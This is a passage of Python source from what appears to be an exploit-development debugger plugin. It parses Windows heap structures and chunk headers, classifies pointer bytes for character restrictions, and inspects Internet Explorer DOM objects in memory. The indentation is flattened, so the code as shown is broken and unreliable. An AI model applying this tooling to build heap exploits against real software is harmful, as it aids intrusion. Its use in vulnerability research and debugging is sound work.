lalhead_flink = struct.unpack('<L',dbg.readMemory(thisptr,4))[0]
if lalhead_flink != 0:
thissize = (lalindex * 8)
next_flink = lalhead_flink
seqnr = 0
thislal = {}
while next_flink != 0 and next_flink != startloc:
chunk = self.getHeapChunkHeaderAtAddress(next_flink-8,8,"lal")
next_flink = chunk.flink
thislal[seqnr] = chunk
seqnr += 1
lal[lalindex] = thislal
lalindex += 1
return lal
def getFreeListInUseBitmap(self):
global FreeListBitmap
if not self.heapbase in FreeListBitmap:
FreeListBitmapHeap = []
cnt = 0
while cnt < 4:
fldword = dbg.readLong(self.heapbase+0x158 + (4 * cnt))
bitmapbits = DwordToBits(fldword)
#print "0x%08x : %s (%d)" % (fldword,bitmapbits,len(bitmapbits))
for thisbit in bitmapbits:
FreeListBitmapHeap.append(thisbit)
cnt += 1
FreeListBitmap[self.heapbase] = FreeListBitmapHeap
return FreeListBitmap[self.heapbase]
def getFreeList(self):
"""
Retrieves the FreeLists (XP/2003) for the current heap
Returns : a dictionary, key = FreeList table index
Each element in the dictionary contains a dictionary, using the FreeList position as key
and each element in this dictionary contains an MnChunk object
"""
freelists = {}
if not win7mode:
flindex = 0
while flindex < 128:
freelistflink = self.heapbase + 0x178 + (8 * flindex) + 4
freelistblink = self.heapbase + 0x178 + (8 * flindex)
endchain = False
try:
tblink = struct.unpack('<L',dbg.readMemory(freelistflink,4))[0]
tflink = struct.unpack('<L',dbg.readMemory(freelistblink,4))[0]
origblink = freelistblink
if freelistblink != tblink:
thisfreelist = {}
endchain = False
thisfreelistindex = 0
pflink = 0
while not endchain:
try:
freelistentry = self.getHeapChunkHeaderAtAddress(tflink-8,8,"freelist")
thisfreelist[thisfreelistindex] = freelistentry
thisfreelistindex += 1
thisblink = struct.unpack('<L',dbg.readMemory(tflink+4,4))[0]
thisflink = struct.unpack('<L',dbg.readMemory(tflink,4))[0]
tflink=thisflink
if (tflink == origblink) or (tflink == pflink):
endchain = True
pflink = tflink
except:
endchain = True
freelists[flindex] = thisfreelist
except:
continue
flindex += 1
return freelists
def getVirtualAllocdBlocks(self):
"""
Retrieves the VirtualAllocdBlocks list from the selected heap
Return: A dictionary, using the start of a virtualallocdblock as key
Each entry in the dictionary contains a MnChunk object, with chunktype set to "virtualalloc"
"""
global VACache
offset = getOsOffset("VirtualAllocdBlocks")
encodingkey = 0
if win7mode:
encodingkey = self.getEncodingKey()
if not self.heapbase in VACache:
try:
# get virtualallocdBlocks for this heap
vaptr = self.heapbase + offset
valistentry = struct.unpack('<L',dbg.readMemory(vaptr,4))[0]
while valistentry != vaptr:
# get VA Header info
# header:
# size size
# (x86) (x64)
# ===== =====
# FLINK 4 8
# BLINK 4 8
# Normal header 8 16 encoded on Win7+
# CommitSize 4 8
# ReserveSize 4 8 = requested size
# BusyBlock 8 16
headersize = 0
heoffset = 0 # HEAP_ENTRY offset (@ BusyBlock)
vaheader = None
flink = 0
blink = 0
commitsize = 0
reservesize = 0
size = 0
if arch == 32:
headersize = 32
heoffset = 24
vaheader = dbg.readMemory(valistentry,headersize)
flink = struct.unpack('<L',vaheader[0:4])[0]
blink = struct.unpack('<L',vaheader[4:8])[0]
commitsize = struct.unpack('<L',vaheader[16:20])[0]
reservesize = struct.unpack('<L',vaheader[20:24])[0]
elif arch == 64:
headersize = 64
heoffset = 48
vaheader = dbg.readMemory(valistentry,headersize)
flink = struct.unpack('<Q',vaheader[0:8])[0]
blink = struct.unpack('<Q',vaheader[8:16])[0]
commitsize = struct.unpack('<Q',vaheader[32:40])[0]
reservesize = struct.unpack('<Q',vaheader[40:48])[0]
size_e = struct.unpack('<H',vaheader[heoffset:heoffset+2])[0]
if win7mode:
size = (size_e ^ (encodingkey & 0xFFFF))
else:
size = size_e
#prevsize = struct.unpack('<H',vaheader[26:28])[0]
prevsize = 0
segmentid = struct.unpack('<B',vaheader[heoffset+4:heoffset+5])[0]
flag = struct.unpack('<B',vaheader[heoffset+5:heoffset+6])[0]
if win7mode:
flag = struct.unpack('<B',vaheader[heoffset+2:heoffset+3])[0]
unused = struct.unpack('<B',vaheader[heoffset+6:heoffset+7])[0]
tag = struct.unpack('<B',vaheader[heoffset+7:])[0]
chunkobj = MnChunk(valistentry,"virtualalloc",headersize,self.heapbase,0,size,prevsize,segmentid,flag,unused,tag,flink,blink,commitsize,reservesize)
self.VirtualAllocdBlocks[valistentry] = chunkobj
valistentry = struct.unpack('<L',dbg.readMemory(valistentry,4))[0]
VACache[self.heapbase] = self.VirtualAllocdBlocks
except:
pass
else:
self.VirtualAllocdBlocks = VACache[self.heapbase]
return self.VirtualAllocdBlocks
def getHeapSegmentList(self):
"""
Will collect all segments for the current heap object
Return: A dictionary, using the start of a segment as key
Each entry in the dictionary has 4 fields :
start of segment, end of segment, FirstEntry and LastValidEntry
"""
self.SegmentList = getSegmentsForHeap(self.heapbase)
# segstart,segend,firstentry,lastentry
return self.SegmentList
def usesLFH(self):
"""
Checks if the current heap has LFH enabled
Return: Boolean
"""
if win7mode:
frontendheaptype = self.getFrontEndHeapType()
if frontendheaptype == 0x2:
return True
else:
return False
else:
return False
def getLFHAddress(self):
"""
Retrieves the address of the Low Fragmentation Heap for the current heap
Return: Int
"""
return readPtrSizeBytes(self.heapbase+getOsOffset("FrontEndHeap"))
def getState(self):
"""
Enumerates all segments, chunks and VirtualAllocdBlocks in the current heap
Return: array of dicts
0 : segments (with segment addy as key), contains list of chunks
1 : vablocks
Key: Heap
Contents:
Segment -> Chunks
VA Blocks
"""
statedata = {}
segments = getSegmentsForHeap(self.heapbase)
for seg in segments:
segstart = segments[seg][0]
segend = segments[seg][1]
FirstEntry = segments[seg][2]
LastValidEntry = segments[seg][3]
datablocks = walkSegment(FirstEntry,LastValidEntry,self.heapbase)
statedata[seg] = datablocks
return statedata
"""
Low Fragmentation Heap
"""
class MnLFH():
# +0x000 Lock : _RTL_CRITICAL_SECTION
# +0x018 SubSegmentZones : _LIST_ENTRY
# +0x020 ZoneBlockSize : Uint4B
# +0x024 Heap : Ptr32 Void
# +0x028 SegmentChange : Uint4B
# +0x02c SegmentCreate : Uint4B
# +0x030 SegmentInsertInFree : Uint4B
# +0x034 SegmentDelete : Uint4B
# +0x038 CacheAllocs : Uint4B
# +0x03c CacheFrees : Uint4B
# +0x040 SizeInCache : Uint4B
# +0x048 RunInfo : _HEAP_BUCKET_RUN_INFO
# +0x050 UserBlockCache : [12] _USER_MEMORY_CACHE_ENTRY
# +0x110 Buckets : [128] _HEAP_BUCKET
# +0x310 LocalData : [1] _HEAP_LOCAL_DATA
# blocks : LocalData->SegmentInfos->SubSegments (Mgmt List)->SubSegs
# class attributes
Lock = None
SubSegmentZones = None
ZoneBlockSize = None
Heap = None
SegmentChange = None
SegmentCreate = None
SegmentInsertInFree = None
SegmentDelete = None
CacheAllocs = None
CacheFrees = None
SizeInCache = None
RunInfo = None
UserBlockCache = None
Buckets = None
LocalData = None
def __init__(self,lfhbase):
self.lfhbase = lfhbase
self.populateLFHFields()
return
def populateLFHFields(self):
# read 0x310 bytes and split into pieces
FLHHeader = dbg.readMemory(self.lfhbase,0x310)
self.Lock = FLHHeader[0:0x18]
self.SubSegmentZones = []
self.SubSegmentZones.append(struct.unpack('<L',FLHHeader[0x18:0x1c])[0])
self.SubSegmentZones.append(struct.unpack('<L',FLHHeader[0x1c:0x20])[0])
self.ZoneBlockSize = struct.unpack('<L',FLHHeader[0x20:0x24])[0]
self.Heap = struct.unpack('<L',FLHHeader[0x24:0x28])[0]
self.SegmentChange = struct.unpack('<L',FLHHeader[0x28:0x2c])[0]
self.SegmentCreate = struct.unpack('<L',FLHHeader[0x2c:0x30])[0]
self.SegmentInsertInFree = struct.unpack('<L',FLHHeader[0x30:0x34])[0]
self.SegmentDelete = struct.unpack('<L',FLHHeader[0x34:0x38])[0]
self.CacheAllocs = struct.unpack('<L',FLHHeader[0x38:0x3c])[0]
self.CacheFrees = struct.unpack('<L',FLHHeader[0x3c:0x40])[0]
self.SizeInCache = struct.unpack('<L',FLHHeader[0x40:0x44])[0]
self.RunInfo = []
self.RunInfo.append(struct.unpack('<L',FLHHeader[0x48:0x4c])[0])
self.RunInfo.append(struct.unpack('<L',FLHHeader[0x4c:0x50])[0])
self.UserBlockCache = []
cnt = 0
while cnt < (12*4):
self.UserBlockCache.append(struct.unpack('<L',FLHHeader[0x50+cnt:0x54+cnt])[0])
cnt += 4
def getSegmentInfo(self):
# input : self.LocalData
# output : return SubSegment
return
def getSubSegmentList(self):
# input : SubSegment
# output : subsegment mgmt list
return
def getSubSegment(self):
# input : subsegment list
# output : subsegments/blocks
return
"""
MnHeap Childclass
"""
class MnSegment:
def __init__(self,heapbase,segmentstart,segmentend,firstentry=0,lastvalidentry=0):
self.heapbase = heapbase
self.segmentstart = segmentstart
self.segmentend = segmentend
self.firstentry = segmentstart
self.lastvalidentry = segmentend
if firstentry > 0:
self.firstentry = firstentry
if lastvalidentry > 0:
self.lastvalidentry = lastvalidentry
self.chunks = {}
def getChunks(self):
"""
Enumerate all chunks in the current segment
Output : Dictionary, key = chunkptr
Values : MnChunk objects
chunktype will be set to "chunk"
"""
thischunk = self.firstentry
allchunksfound = False
allchunks = {}
nextchunk = thischunk
cnt = 0
savedprevsize = 0
mHeap = MnHeap(self.heapbase)
key = mHeap.getEncodingKey()
while not allchunksfound:
thissize = 0
prevsize = 0
flag = 0
unused = 0
segmentid = 0
tag = 0
headersize = 0x8
try:
fullheaderbin = ""
if key == 0 and not win7mode:
fullheaderbin = dbg.readMemory(thischunk,headersize)
else:
fullheaderbin = decodeHeapHeader(thischunk,headersize,key)
sizebytes = fullheaderbin[0:2]
thissize = struct.unpack('<H',sizebytes)[0]
if key == 0 and not win7mode:
prevsizebytes = struct.unpack('<H',fullheaderbin[2:4])[0]
segmentid = struct.unpack('<B',fullheaderbin[4:5])[0]
flag = struct.unpack('<B',fullheaderbin[5:6])[0]
unused = struct.unpack('<B',fullheaderbin[6:7])[0]
tag = struct.unpack('<B',fullheaderbin[7:8])[0]
else:
flag = struct.unpack('<B',fullheaderbin[2:3])[0]
tag = struct.unpack('<B',fullheaderbin[3:4])[0]
prevsizebytes = struct.unpack('<H',fullheaderbin[4:6])[0]
segmentid = struct.unpack('<B',fullheaderbin[6:7])[0]
unused = struct.unpack('<B',fullheaderbin[7:8])[0]
if savedprevsize == 0:
prevsize = 0
savedprevsize = thissize
else:
prevsize = savedprevsize
savedprevsize = thissize
#prevsize = prevsizebytes
except:
thissize = 0
prevsize = 0
flag = 0
unused = 0
if thissize > 0:
nextchunk = thischunk + (thissize * 8)
else:
nextchunk += headersize
chunktype = "chunk"
if "virtall" in getHeapFlag(flag).lower() or "internal" in getHeapFlag(flag).lower():
#chunktype = "virtualalloc"
headersize = 0x20
if not thischunk in allchunks and thissize > 0:
mChunk = MnChunk(thischunk,chunktype,headersize,self.heapbase,self.segmentstart,thissize,prevsize,segmentid,flag,unused,tag)
allchunks[thischunk] = mChunk
thischunk = nextchunk
if nextchunk >= self.lastvalidentry:
allchunksfound = True
if "last" in getHeapFlag(flag).lower():
allchunksfound = True
cnt += 1
self.chunks = allchunks
return allchunks
"""
Chunk class
"""
class MnChunk:
chunkptr = 0
chunktype = ""
headersize = 0
extraheadersize = 0
heapbase = 0
segmentbase = 0
size = 0
prevsize = 0
segment = 0
flag = 0
flags = 0
unused = 0
tag = 0
flink = 0
blink = 0
commitsize = 0
reservesize = 0
remaining = 0
hasust = False
dph_block_information_startstamp = 0
dph_block_information_heap = 0
dph_block_information_requestedsize = 0
dph_block_information_actualsize = 0
dph_block_information_traceindex = 0
dph_block_information_stacktrace = 0
dph_block_information_endstamp = 0
def __init__(self,chunkptr,chunktype,headersize,heapbase,segmentbase,size,prevsize,segment,flag,unused,tag,flink=0,blink=0,commitsize=0,reservesize=0):
self.chunkptr = chunkptr
self.chunktype = chunktype
self.extraheadersize = 0
self.remaining = 0
self.dph_block_information_startstamp = 0
self.dph_block_information_heap = 0
self.dph_block_information_requestedsize = 0
self.dph_block_information_actualsize = 0
self.dph_block_information_traceindex = 0
self.dph_block_information_stacktrace = 0
self.dph_block_information_endstamp = 0
self.hasust = False
# if ust/hpa is enabled, the chunk header is followed by 32bytes of DPH_BLOCK_INFORMATION header info
currentflagnames = getNtGlobalFlagNames(getNtGlobalFlag())
if "ust" in currentflagnames:
self.hasust = True
if "hpa" in currentflagnames:
# reader header info
if arch == 32:
self.extraheadersize = 0x20
try:
raw_dph_header = dbg.readMemory(chunkptr + headersize,0x20)
self.dph_block_information_startstamp = struct.unpack('<L',raw_dph_header[0:4])[0]
self.dph_block_information_heap = struct.unpack('<L',raw_dph_header[4:8])[0]
self.dph_block_information_requestedsize = struct.unpack('<L',raw_dph_header[8:12])[0]
self.dph_block_information_actualsize = struct.unpack('<L',raw_dph_header[12:16])[0]
self.dph_block_information_traceindex = struct.unpack('<H',raw_dph_header[16:18])[0]
self.dph_block_information_stacktrace = struct.unpack('<L',raw_dph_header[24:28])[0]
self.dph_block_information_endstamp = struct.unpack('<L',raw_dph_header[28:32])[0]
except:
pass
elif arch == 64:
self.extraheadersize = 0x40
# reader header info
try:
raw_dph_header = dbg.readMemory(chunkptr + headersize,0x40)
self.dph_block_information_startstamp = struct.unpack('<L',raw_dph_header[0:4])[0]
self.dph_block_information_heap = struct.unpack('<Q',raw_dph_header[8:16])[0]
self.dph_block_information_requestedsize = struct.unpack('<Q',raw_dph_header[16:24])[0]
self.dph_block_information_actualsize = struct.unpack('<Q',raw_dph_header[24:32])[0]
self.dph_block_information_traceindex = struct.unpack('<H',raw_dph_header[32:34])[0]
self.dph_block_information_stacktrace = struct.unpack('<Q',raw_dph_header[48:56])[0]
self.dph_block_information_endstamp = struct.unpack('<L',raw_dph_header[60:64])[0]
except:
pass
self.headersize = headersize
self.heapbase = heapbase
self.segmentbase = segmentbase
self.size = size
self.prevsize = prevsize
self.segment = segment
self.flag = flag
self.flags = flag
self.unused = unused
self.tag = tag
self.flink = flink
self.blink = blink
self.commitsize = commitsize
self.reservesize = reservesize
self.userptr = self.chunkptr + self.headersize + self.extraheadersize
self.usersize = (self.size * heapgranularity) - self.unused - self.extraheadersize
self.remaining = self.unused - self.headersize - self.extraheadersize
self.flagtxt = getHeapFlag(self.flag)
def showChunk(self,showdata = False):
chunkshown = False
if self.chunktype == "chunk":
dbg.log(" _HEAP @ %08x, Segment @ %08x" % (self.heapbase,self.segmentbase))
if win7mode:
iHeap = MnHeap(self.heapbase)
if iHeap.usesLFH():
dbg.log(" Heap has LFH enabled. LFH Heap starts at 0x%08x" % iHeap.getLFHAddress())
if "busy" in self.flagtxt.lower() and "virtallocd" in self.flagtxt.lower():
dbg.log(" ** This chunk may be managed by LFH")
self.flagtxt = self.flagtxt.replace("Virtallocd","Internal")
dbg.log(" ( bytes ) (bytes)")
dbg.log(" HEAP_ENTRY Size PrevSize Unused Flags UserPtr UserSize Remaining - state")
dbg.log(" %08x %08x %08x %08x [%02x] %08x %08x %08x %s (hex)" % (self.chunkptr,self.size*heapgranularity,self.prevsize*heapgranularity,self.unused,self.flag,self.userptr,self.usersize,self.unused-self.headersize,self.flagtxt))
dbg.log(" %08d %08d %08d %08d %08d %s (dec)" % (self.size*heapgranularity,self.prevsize*heapgranularity,self.unused,self.usersize,self.unused-self.headersize,self.flagtxt))
dbg.log("")
chunkshown = True
if self.chunktype == "virtualalloc":
dbg.log(" _HEAP @ %08x, VirtualAllocdBlocks" % (self.heapbase))
dbg.log(" FLINK : 0x%08x, BLINK : 0x%08x" % (self.flink,self.blink))
dbg.log(" CommitSize : 0x%08x bytes, ReserveSize : 0x%08x bytes" % (self.commitsize*heapgranularity, self.reservesize*heapgranularity))
dbg.log(" ( bytes ) (bytes)")
dbg.log(" HEAP_ENTRY Size PrevSize Unused Flags UserPtr UserSize - state")
dbg.log(" %08x %08x %08x %08x [%02x] %08x %08x %s (hex)" % (self.chunkptr,self.size*heapgranularity,self.prevsize*heapgranularity,self.unused,self.flag,self.userptr,self.usersize,self.flagtxt))
dbg.log(" %08d %08d %08d %08d %s (dec)" % (self.size*heapgranularity,self.prevsize*heapgranularity,self.unused,self.usersize,self.flagtxt))
dbg.log("")
chunkshown = True
if chunkshown:
requestedsize = self.usersize
dbg.log(" Chunk header size: 0x%x (%d)" % (self.headersize,self.headersize))
if self.extraheadersize > 0:
dbg.log(" Extra header due to GFlags: 0x%x (%d) bytes" % (self.extraheadersize,self.extraheadersize))
if self.dph_block_information_stacktrace > 0:
dbg.log(" DPH_BLOCK_INFORMATION Header size: 0x%x (%d)" % (self.extraheadersize,self.extraheadersize))
dbg.log(" StartStamp : 0x%08x" % self.dph_block_information_startstamp)
dbg.log(" Heap : 0x%08x" % self.dph_block_information_heap)
dbg.log(" RequestedSize : 0x%08x" % self.dph_block_information_requestedsize)
requestedsize = self.dph_block_information_requestedsize
dbg.log(" ActualSize : 0x%08x" % self.dph_block_information_actualsize)
dbg.log(" TraceIndex : 0x%08x" % self.dph_block_information_traceindex)
dbg.log(" StackTrace : 0x%08x" % self.dph_block_information_stacktrace)
dbg.log(" EndStamp : 0x%08x" % self.dph_block_information_endstamp)
dbg.log(" Size initial allocation request: 0x%x (%d)" % (requestedsize,requestedsize))
dbg.log(" Total space for data: 0x%x (%d)" % (self.usersize + self.unused - self.headersize,self.usersize + self.unused - self.headersize))
dbg.log(" Delta between initial size and total space for data: 0x%x (%d)" % (self.unused - self.headersize, self.unused-self.headersize))
if showdata:
dsize = self.usersize + self.remaining
if dsize > 0 and dsize < 32:
contents = bin2hex(dbg.readMemory(self.userptr,self.usersize+self.remaining))
else:
contents = bin2hex(dbg.readMemory(self.userptr,32)) + " ..."
dbg.log(" Data : %s" % contents)
dbg.log("")
return
def showChunkLine(self,showdata = False):
return
#---------------------------------------#
# Class to access pointer properties #
#---------------------------------------#
class MnPointer:
"""
Class to access pointer properties
"""
def __init__(self,address):
# check that the address is an integer
if not type(address) == int and not type(address) == long:
raise Exception("address should be an integer or long")
self.address = address
NullRange = [0]
AsciiRange = range(1,128)
AsciiPrintRange = range(20,127)
AsciiUppercaseRange = range(65,91)
AsciiLowercaseRange = range(97,123)
AsciiAlphaRange = AsciiUppercaseRange + AsciiLowercaseRange
AsciiNumericRange = range(48,58)
AsciiSpaceRange = [32]
self.HexAddress = toHex(address)
# define the characteristics of the pointer
byte1,byte2,byte3,byte4,byte5,byte6,byte7,byte8 = (0,)*8
if arch == 32:
byte1,byte2,byte3,byte4 = splitAddress(address)
elif arch == 64:
byte1,byte2,byte3,byte4,byte5,byte6,byte7,byte8 = splitAddress(address)
# Nulls
self.hasNulls = (byte1 == 0) or (byte2 == 0) or (byte3 == 0) or (byte4 == 0)
# Starts with null
self.startsWithNull = (byte1 == 0)
# Unicode
self.isUnicode = ((byte1 == 0) and (byte3 == 0))
# Unicode reversed
self.isUnicodeRev = ((byte2 == 0) and (byte4 == 0))
if arch == 64:
self.hasNulls = self.hasNulls or (byte5 == 0) or (byte6 == 0) or (byte7 == 0) or (byte8 == 0)
self.isUnicode = self.isUnicode and ((byte5 == 0) and (byte7 == 0))
self.isUnicodeRev = self.isUnicodeRev and ((byte6 == 0) and (byte8 == 0))
# Unicode transform
self.unicodeTransform = UnicodeTransformInfo(self.HexAddress)
# Ascii
if not self.isUnicode and not self.isUnicodeRev:
self.isAscii = bytesInRange(address, AsciiRange)
else:
self.isAscii = bytesInRange(address, NullRange + AsciiRange)
# AsciiPrintable
if not self.isUnicode and not self.isUnicodeRev:
self.isAsciiPrintable = bytesInRange(address, AsciiPrintRange)
else:
self.isAsciiPrintable = bytesInRange(address, NullRange + AsciiPrintRange)
# Uppercase
if not self.isUnicode and not self.isUnicodeRev:
self.isUppercase = bytesInRange(address, AsciiUppercaseRange)
else:
self.isUppercase = bytesInRange(address, NullRange + AsciiUppercaseRange)
# Lowercase
if not self.isUnicode and not self.isUnicodeRev:
self.isLowercase = bytesInRange(address, AsciiLowercaseRange)
else:
self.isLowercase = bytesInRange(address, NullRange + AsciiLowercaseRange)
# Numeric
if not self.isUnicode and not self.isUnicodeRev:
self.isNumeric = bytesInRange(address, AsciiNumericRange)
else:
self.isNumeric = bytesInRange(address, NullRange + AsciiNumericRange)
# Alpha numeric
if not self.isUnicode and not self.isUnicodeRev:
self.isAlphaNumeric = bytesInRange(address, AsciiAlphaRange + AsciiNumericRange + AsciiSpaceRange)
else:
self.isAlphaNumeric = bytesInRange(address, NullRange + AsciiAlphaRange + AsciiNumericRange + AsciiSpaceRange)
# Uppercase + Numbers
if not self.isUnicode and not self.isUnicodeRev:
self.isUpperNum = bytesInRange(address, AsciiUppercaseRange + AsciiNumericRange)
else:
self.isUpperNum = bytesInRange(address, NullRange + AsciiUppercaseRange + AsciiNumericRange)
# Lowercase + Numbers
if not self.isUnicode and not self.isUnicodeRev:
self.isLowerNum = bytesInRange(address, AsciiLowercaseRange + AsciiNumericRange)
else:
self.isLowerNum = bytesInRange(address, NullRange + AsciiLowercaseRange + AsciiNumericRange)
def __str__(self):
"""
Get pointer properties (human readable format)
Arguments:
None
Return:
String with various properties about the pointer
"""
outstring = ""
if self.startsWithNull:
outstring += "startnull,"
elif self.hasNulls:
outstring += "null,"
#check if this pointer is unicode transform
hexaddr = self.HexAddress
outstring += UnicodeTransformInfo(hexaddr)
if self.isUnicode:
outstring += "unicode,"
if self.isUnicodeRev:
outstring += "unicodereverse,"
if self.isAsciiPrintable:
outstring += "asciiprint,"
if self.isAscii:
outstring += "ascii,"
if self.isUppercase:
outstring == "upper,"
if self.isLowercase:
outstring += "lower,"
if self.isNumeric:
outstring+= "num,"
if self.isAlphaNumeric and not (self.isUppercase or self.isLowercase or self.isNumeric):
outstring += "alphanum,"
if self.isUpperNum and not (self.isUppercase or self.isNumeric):
outstring += "uppernum,"
if self.isLowerNum and not (self.isLowercase or self.isNumeric):
outstring += "lowernum,"
outstring = outstring.rstrip(",")
outstring += " {" + getPointerAccess(self.address)+"}"
return outstring
def getAddress(self):
return self.address
def isUnicode(self):
return self.isUnicode
def isUnicodeRev(self):
return self.isUnicodeRev
def isUnicodeTransform(self):
return self.unicodeTransform != ""
def isAscii(self):
return self.isAscii
def isAsciiPrintable(self):
return self.isAsciiPrintable
def isUppercase(self):
return self.isUppercase
def isLowercase(self):
return self.isLowercase
def isUpperNum(self):
return self.isUpperNum
def isLowerNum(self):
return self.isLowerNum
def isNumeric(self):
return self.isNumeric
def isAlphaNumeric(self):
return self.alphaNumeric
def hasNulls(self):
return self.hasNulls
def startsWithNull(self):
return self.startsWithNull
def belongsTo(self):
"""
Retrieves the module a given pointer belongs to
Arguments:
None
Return:
String with the name of the module a pointer belongs to,
or empty if pointer does not belong to a module
"""
if len(g_modules)==0:
populateModuleInfo()
for thismodule,modproperties in g_modules.iteritems():
thisbase = getModuleProperty(thismodule,"base")
thistop = getModuleProperty(thismodule,"top")
if (self.address >= thisbase) and (self.address <= thistop):
return thismodule
return ""
def isOnStack(self):
"""
Checks if the pointer is on one of the stacks of one of the threads in the process
Arguments:
None
Return:
Boolean - True if pointer is on stack
"""
stacks = getStacks()
for stack in stacks:
if (stacks[stack][0] <= self.address) and (self.address < stacks[stack][1]):
return True
return False
def isInHeap(self):
"""
Checks if the pointer is part of one of the pages associated with process heaps/segments
Arguments:
None
Return:
Boolean - True if pointer is in heap
"""
segmentcnt = 0
for heap in dbg.getHeapsAddress():
# part of a segment ?
segments = getSegmentsForHeap(heap)
for segment in segments:
if segmentcnt == 0:
# in heap data structure
if self.address >= heap and self.address <= segment:
return True
segmentcnt += 1
if self.address >= segment:
last = segments[segment][3]
if self.address >= segment and self.address <= last:
return True
# maybe it's in a VA List ?
for heap in dbg.getHeapsAddress():
mHeap = MnHeap(heap)
valist = mHeap.getVirtualAllocdBlocks()
if len(valist) > 0:
for vachunk in valist:
thischunk = valist[vachunk]
#dbg.log("self: 0x%08x, vachunk: 0x%08x, commitsize: 0x%08x, vachunk+(thischunk.commitsize)*8: 0x%08x" % (self.address,vachunk,thischunk.commitsize,vachunk+(thischunk.commitsize*8)))
if self.address >= vachunk and self.address <= (vachunk+(thischunk.commitsize*heapgranularity)):
return True
return False
def getHeapInfo(self):
global silent
oldsilent = silent
silent = True
foundinheap, foundinsegment, foundinva, foundinchunk = self.showHeapBlockInfo()
silent = oldsilent
return [foundinheap, foundinsegment, foundinva, foundinchunk]
def getHeapInfo_old(self):
"""
Returns heap related information about a given pointer
"""
heapinfo = {}
heapinfo["heap"] = 0
heapinfo["segment"] = 0
heapinfo["chunk"] = 0
heapinfo["size"] = 0
allheaps = dbg.getHeapsAddress()
for heap in allheaps:
dbg.log("checking heap 0x%08x for 0x%08x" % (heap,self.address))
theap = dbg.getHeap(heap)
heapchunks = theap.getChunks(heap)
if len(heapchunks) > 0 and not silent:
dbg.log("Querying segment(s) for heap 0x%s" % toHex(heap))
for hchunk in heapchunks:
chunkbase = hchunk.get("address")
chunksize = hchunk.get("size")
if self.address >= chunkbase and self.address <= (chunkbase+chunksize):
heapinfo["heap"] = heap
heapinfo["segment"] = 0
heapinfo["chunk"] = chunkbase
heapinfo["size"] = chunksize
return heapinfo
return heapinfo
def showObjectInfo(self):
# check if chunk is a DOM object
if __DEBUGGERAPP__ == "WinDBG":
cmdtorun = "dds 0x%08x L 1" % self.address
output = dbg.nativeCommand(cmdtorun)
outputlower = output.lower()
outputlines = output.split("\n")
if "vftable" in outputlower:
# is this Internet Explorer ?
ieversion = 0
if isModuleLoadedInProcess('iexplore.exe') and isModuleLoadedInProcess('mshtml.dll'):
ieversionstr = getModuleProperty('iexplore.exe','version')
dbg.log(" Internet Explorer v%s detected" % ieversionstr)
ieversion = 0
if ieversionstr.startswith("8."):
ieversion = 8
if ieversionstr.startswith("9."):
ieversion = 9
if ieversionstr.startswith("10."):
ieversion = 10
dbg.log(" 0x%08x may be the start of an object, vtable pointer: %s" % (self.address,outputlines[0]))
vtableptr_s = outputlines[0][10:18]
try:
vtableptr = hexStrToInt(vtableptr_s)
dbg.log(" Start of vtable at 0x%08x: (showing first 4 entries only)" % vtableptr)
cmdtorun = "dds 0x%08x L 4" % vtableptr
output = dbg.nativeCommand(cmdtorun)
outputlines = output.split("\n")
cnt = 0
for line in outputlines:
if line.replace(" ","") != "":
dbg.log(" +0x%x -> %s" % (cnt,line))
cnt += 4
if "mshtml!" in outputlower and ieversion > 7:
# see if we can find the object type, refcounter, attribute count, parent, etc
refcounter = None
attributeptr = None
try:
refcounter = dbg.readLong(self.address + 4)
except:
pass
try:
if ieversion == 8:
attributeptr = dbg.readLong(self.address + 0xc)
if ieversion == 9:
attributeptr = dbg.readLong(self.address + 0x10)
except:
pass
if not refcounter is None and not attributeptr is None:
dbg.log(" Refcounter: 0x%x (%d)" % (refcounter,refcounter))
if refcounter > 0x20000:
dbg.log(" Note: a huge refcounter value may indicate this is not a real DOM object")
if attributeptr == 0:
dbg.log(" No attributes found")
else:
ptrx = MnPointer(attributeptr)
if ptrx.isInHeap():
dbg.log(" Attribute info structure stored at 0x%08x" % attributeptr)
offset_nr = 0x4
nr_multiplier = 4
offset_tableptr = 0xc
offset_tabledata = 0
variant_offset = 4
attname_offset = 8
attvalue_offset = 0xc
if ieversion == 9:
nr_multiplier = 1
offset_nr = 0x4
offset_tableptr = 0x8
offset_tabledata = 4
variant_offset = 1
attname_offset = 4
attvalue_offset = 8
nr_attributes = dbg.readLong(attributeptr + offset_nr) / nr_multiplier
attributetableptr = dbg.readLong(attributeptr + offset_tableptr)
dbg.log(" +0x%02x : Nr of attributes: %d" % (offset_nr,nr_attributes))
dbg.log(" +0x%02x : Attribute table at 0x%08x" % (offset_tableptr,attributetableptr))
attcnt = 0
while attcnt < nr_attributes:
try:
dbg.log(" Attribute %d (at 0x%08x) :" % (attcnt+1,attributetableptr))
sec_dword = "%08x" % struct.unpack('<L',dbg.readMemory(attributetableptr+4,4))[0]
variant_type = int(sec_dword[0:2][:-1],16)
dbg.log(" Variant Type : 0x%02x (%s)" % (variant_type,getVariantType(variant_type)))
if variant_type > 0x1:
att_name = "<n.a.>"
try:
att_name_ptr = dbg.readLong(attributetableptr+attname_offset)
att_name_ptr_value = dbg.readLong(att_name_ptr+4)
att_name = dbg.readWString(att_name_ptr_value)
except:
att_name = "<n.a.>"
dbg.log(" 0x%08x + 0x%02x (0x%08x): 0x%08x : &Attribute name : '%s'" % (attributetableptr,attname_offset,attributetableptr+attname_offset,att_name_ptr,att_name))
att_value_ptr = dbg.readLong(attributetableptr+attvalue_offset)
ptrx = MnPointer(att_value_ptr)
if ptrx.isInHeap():
att_value = ""
if variant_type == 0x8:
att_value = dbg.readWString(att_value_ptr)
if variant_type == 0x16:
attv = dbg.readLong(att_value_ptr)
att_value = "0x%08x (%s)" % (attv,int("0x%08x" % attv,16))
if variant_type == 0x1e:
att_from = dbg.readLong(att_value_ptr)
att_value = dbg.readString(att_from)
if variant_type == 0x1f:
att_from = dbg.readLong(att_value_ptr)
att_value = dbg.readWString(att_from)
else:
att_value = "0x%08x (%s)" % (att_value_ptr,int("0x%08x" % att_value_ptr,16))
dbg.log(" 0x%08x + 0x%02x (0x%08x): 0x%08x : &Value : %s" % (attributetableptr,attvalue_offset,attributetableptr+attvalue_offset,att_value_ptr,att_value))
except:
dbg.logLines(traceback.format_exc(),highlight=True)
break
attributetableptr += 0x10
attcnt += 1
else:
dbg.log(" Invalid attribute ptr found (0x%08x). This may not be a real DOM object." % attributeptr)
offset_domtree = 0x14
if ieversion == 9:
offset_domtree = 0x1C
domtreeptr = dbg.readLong(self.address + offset_domtree)
if not domtreeptr is None:
dptrx = MnPointer(domtreeptr)
if dptrx.isInHeap():
currobj = self.address
moreparents = True
parentcnt = 0
